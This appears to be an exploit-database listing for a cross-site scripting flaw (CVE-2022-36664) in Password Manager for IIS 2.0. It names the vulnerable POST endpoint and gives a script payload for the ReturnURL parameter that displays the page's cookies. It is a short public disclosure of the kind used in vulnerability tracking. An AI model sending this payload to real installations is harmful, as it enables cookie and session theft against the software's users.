Lucene search

K
zdtVP4TR10T1337DAY-ID-38015
HistoryOct 04, 2022 - 12:00 a.m.

Password Manager For IIS 2.0 Cross Site Scripting Vulneraility

2022-10-0400:00:00
VP4TR10T
0day.today
180
password manager
iis
cross site scripting

EPSS

0.001

Percentile

47.3%

# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664

*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>

*Cordially,*

EPSS

0.001

Percentile

47.3%